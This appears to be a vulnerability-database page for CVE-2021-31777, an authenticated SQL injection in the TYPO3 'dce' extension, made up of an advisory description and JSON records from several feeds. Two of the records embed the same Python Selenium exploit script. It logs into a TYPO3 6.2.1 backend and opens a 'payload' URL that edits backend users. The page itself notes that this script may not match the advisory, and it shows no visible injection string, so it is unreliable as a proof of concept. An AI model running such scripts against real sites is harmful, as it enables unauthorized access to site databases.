Description
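The dce (aka Dynamic Content Element) extension for TYPO3, versions 2.2.0 through 2.6.x before 2.6.2 and 2.7.x before 2.7.1, allows SQL injection by an authenticated backend user. A TYPO3 backend account is required to reach the flaw; 2.6.2 and 2.7.1 are the first versions outside the affected range. The structured affectedSoftware data below encodes only the 2.2.0 to 2.6.2 range, so the 2.7.x range should be taken from this description. The related exploit entries are titled for TYPO3 6.2.1 and do not mention the dce extension, so their applicability to this advisory should be checked against the vendor advisory (TYPO3-EXT-SA-2021-005).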
Affected Software
Related
{"id": "GHSA-5V5H-4W2G-GXXC", "vendorId": null, "type": "github", "bulletinFamily": "software", "title": "SQL Injection in t3/dce", "description": "The dce (aka Dynamic Content Element) extension 2.2.0 through 2.6.x before 2.6.2, and 2.7.x before 2.7.1, for TYPO3 allows SQL Injection via a backend user account.", "published": "2021-06-08T20:12:23", "modified": "2022-08-13T03:06:29", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 4.0}, "severity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE", "baseScore": 4.9, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 1.2, "impactScore": 3.6}, "href": "https://github.com/advisories/GHSA-5v5h-4w2g-gxxc", "reporter": "GitHub Advisory Database", "references": ["https://nvd.nist.gov/vuln/detail/CVE-2021-31777", "https://bitbucket.org/ArminVieweg/dce/commits/998a2392f69f2153797c5ace6e8914ca309e70c7", "https://excellium-services.com/cert-xlm-advisory/", "https://packagist.org/packages/t3/dce", "https://typo3.org/security/advisory/typo3-ext-sa-2021-005", "http://packetstormsecurity.com/files/162429/TYPO3-6.2.1-SQL-Injection.html", "https://github.com/advisories/GHSA-5v5h-4w2g-gxxc"], "cvelist": ["CVE-2021-31777"], "immutableFields": [], "lastseen": "2022-08-13T05:00:08", 
"viewCount": 20, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-31777"]}, {"type": "osv", "idList": ["OSV:GHSA-5V5H-4W2G-GXXC"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162429"]}, {"type": "typo3", "idList": ["TYPO3-EXT-SA-2021-005"]}, {"type": "zdt", "idList": ["1337DAY-ID-36182"]}], "rev": 4}, "score": {"value": 5.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-31777"]}, {"type": "kitploit", "idList": ["KITPLOIT:3449843613571411531"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:162429"]}, {"type": "typo3", "idList": ["TYPO3-EXT-SA-2021-005"]}, {"type": "zdt", "idList": ["1337DAY-ID-36182"]}]}, "exploitation": null, "vulnersScore": 5.3}, "_state": {"dependencies": 1660367014, "score": 1660367230}, "_internal": {"score_hash": "aebfd88601bf0bed5c882a79fac0c65c"}, "affectedSoftware": [{"version": "2.2.0", "operator": "ge", "ecosystem": "COMPOSER", "name": "t3/dce"}, {"version": "2.6.2", "operator": "lt", "ecosystem": "COMPOSER", "name": "t3/dce"}]}
{"cve": [{"lastseen": "2022-03-23T18:08:09", "description": "The dce (aka Dynamic Content Element) extension 2.2.0 through 2.6.x before 2.6.2, and 2.7.x before 2.7.1, for TYPO3 allows SQL Injection via a backend user account.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "baseScore": 4.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-28T07:15:00", "type": "cve", "title": "CVE-2021-31777", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31777"], "modified": "2021-08-27T13:59:00", "cpe": [], "id": "CVE-2021-31777", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31777", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": []}], "typo3": [{"lastseen": "2021-08-10T12:23:56", "description": "The extension fails to properly sanitize user input and is susceptible to SQL Injection. 
A TYPO3 backend user account is required to exploit the vulnerability.\n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-04-27T00:00:00", "type": "typo3", "title": "SQL Injection in extension \"Dynamic Content Element\" (dce)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31777"], "modified": "2021-04-27T00:00:00", "id": "TYPO3-EXT-SA-2021-005", "href": "https://typo3.org/security/advisory/typo3-ext-sa-2021-005", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2021-05-03T20:54:34", "description": "", "published": "2021-05-03T00:00:00", "type": "packetstorm", "title": "TYPO3 6.2.1 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-31777"], "modified": "2021-05-03T00:00:00", "id": "PACKETSTORM:162429", "href": "https://packetstormsecurity.com/files/162429/TYPO3-6.2.1-SQL-Injection.html", "sourceData": "`# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on backend.php \n# Author: @nu11secur1ty \n# Testing and Debugging: @nu11secur1ty \n# Date: 05.02.2021 \n# Vendor: https://typo3.org/ \n# Link: 
https://get.typo3.org/version/6.2.1 \n# CVE: CVE-2021-31777 \n# Proof: https://streamable.com/8v7v4i \n \n[+] Exploit Source: \n \n#!/usr/bin/python3 \n# Author: @nu11secur1ty \n# CVE-2021-31777 \n \nfrom selenium import webdriver \nimport time \nimport os, sys \n \n \n# Vendor: https://typo3.org/ \nwebsite_link=\"http://192.168.1.3/typo3_src-6.2.1/typo3/index.php\" \n \n# enter your login username \nusername=\"nu11secur1ty\" \n \n# enter your login password \npassword=\"password\" \n \n#enter the element for username input field \nelement_for_username=\"username\" \n \n#enter the element for password input field \nelement_for_password=\"p_field\" \n \n#enter the element for submit button \nelement_for_submit=\"commandLI\" \n \n \n#browser = webdriver.Safari() #for macOS users[for others use chrome vis \nchromedriver] \nbrowser = webdriver.Chrome() #uncomment this line,for chrome users \n#browser = webdriver.Firefox() #uncomment this line,for chrome users \n \ntime.sleep(3) \nbrowser.get((website_link)) \n \ntry: \nusername_element = browser.find_element_by_name(element_for_username) \nusername_element.send_keys(username) \npassword_element = browser.find_element_by_name(element_for_password) \npassword_element.send_keys(password) \nsignInButton = browser.find_element_by_name(element_for_submit) \nsignInButton.click() \n \n# Exploit vulnerability MySQL user table by using backend.php vulnerability \ntime.sleep(3) \n# Payload link \nbrowser.get((\" \nhttp://192.168.1.3/typo3_src-6.2.1/typo3/alt_doc.php?edit[be_users][1]=edit&returnUrl=mod.php%3FM%3Dsystem_BeuserTxBeuser%26moduleToken%3D56862cd856952bfd539277eebf7b21c2a85ff950#\")) \n \n \nprint(\"The payload is deployed it is time to destroy some user...\\n\") \nos.system('pause') \n \nbrowser.close() \n \nexcept Exception: \n#### This exception is if the user is not found in the database or \nsomething is wrong. 
\nprint(\"Sorry, but this user who you searching for is destroyed by using of \nMySQL vulnerability in backend.php...\") \n \n--------------------------------- \n \n# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on \nbackend.php \n# Date: 05.02.2021 \n# Exploit Authotr idea: @nu11secur1ty \n# Exploit Debugging: @nu11secur1ty \n# Vendor Homepage: https://typo3.org/ \n# Software Link: https://get.typo3.org/version/6.2.1 \n \n# Steps to Reproduce: \nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-31777 \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/162429/typo3621-sql.txt"}], "zdt": [{"lastseen": "2021-11-04T04:24:32", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-05-04T00:00:00", "type": "zdt", "title": "TYPO3 6.2.1 SQL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31777"], "modified": "2021-05-04T00:00:00", "id": "1337DAY-ID-36182", "href": "https://0day.today/exploit/description/36182", "sourceData": "# Exploit Title: TYPO3 6.2.1 allows SQL 
Injection via a backend user on backend.php\r\n# Author: @nu11secur1ty\r\n# Testing and Debugging: @nu11secur1ty\r\n# Vendor: https://typo3.org/\r\n# Link: https://get.typo3.org/version/6.2.1\r\n# CVE: CVE-2021-31777\r\n# Proof: https://streamable.com/8v7v4i\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python3\r\n# Author: @nu11secur1ty\r\n# CVE-2021-31777\r\n\r\nfrom selenium import webdriver\r\nimport time\r\nimport os, sys\r\n\r\n\r\n# Vendor: https://typo3.org/\r\nwebsite_link=\"http://192.168.1.3/typo3_src-6.2.1/typo3/index.php\"\r\n\r\n# enter your login username\r\nusername=\"nu11secur1ty\"\r\n\r\n# enter your login password\r\npassword=\"password\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n\r\n#enter the element for password input field\r\nelement_for_password=\"p_field\"\r\n\r\n#enter the element for submit button\r\nelement_for_submit=\"commandLI\"\r\n\r\n\r\n#browser = webdriver.Safari() #for macOS users[for others use chrome vis\r\nchromedriver]\r\nbrowser = webdriver.Chrome() #uncomment this line,for chrome users\r\n#browser = webdriver.Firefox() #uncomment this line,for chrome users\r\n\r\ntime.sleep(3)\r\nbrowser.get((website_link))\r\n\r\ntry:\r\nusername_element = browser.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = browser.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\nsignInButton = browser.find_element_by_name(element_for_submit)\r\nsignInButton.click()\r\n\r\n# Exploit vulnerability MySQL user table by using backend.php vulnerability\r\ntime.sleep(3)\r\n# Payload link\r\nbrowser.get((\"\r\nhttp://192.168.1.3/typo3_src-6.2.1/typo3/alt_doc.php?edit[be_users][1]=edit&returnUrl=mod.php%3FM%3Dsystem_BeuserTxBeuser%26moduleToken%3D56862cd856952bfd539277eebf7b21c2a85ff950#\"))\r\n\r\n\r\nprint(\"The payload is deployed it is time to destroy some 
user...\\n\")\r\nos.system('pause')\r\n\r\nbrowser.close()\r\n\r\nexcept Exception:\r\n#### This exception is if the user is not found in the database or\r\nsomething is wrong.\r\nprint(\"Sorry, but this user who you searching for is destroyed by using of\r\nMySQL vulnerability in backend.php...\")\r\n\r\n---------------------------------\r\n\r\n# Exploit Title: TYPO3 6.2.1 allows SQL Injection via a backend user on\r\nbackend.php\r\n# Date: 05.02.2021\r\n# Exploit Authotr idea: @nu11secur1ty\r\n# Exploit Debugging: @nu11secur1ty\r\n# Vendor Homepage: https://typo3.org/\r\n# Software Link: https://get.typo3.org/version/6.2.1\r\n\r\n# Steps to Reproduce:\r\nhttps://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-31777\n\n# 0day.today [2021-11-04] #", "sourceHref": "https://0day.today/exploit/36182", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "osv": [{"lastseen": "2022-05-12T01:16:15", "description": "The dce (aka Dynamic Content Element) extension 2.2.0 through 2.6.x before 2.6.2, and 2.7.x before 2.7.1, for TYPO3 allows SQL Injection via a backend user account.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "HIGH", "baseScore": 4.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T20:12:23", "type": "osv", "title": "SQL Injection in t3/dce", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31777"], "modified": "2021-05-03T16:51:32", "id": "OSV:GHSA-5V5H-4W2G-GXXC", "href": "https://osv.dev/vulnerability/GHSA-5v5h-4w2g-gxxc", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}]}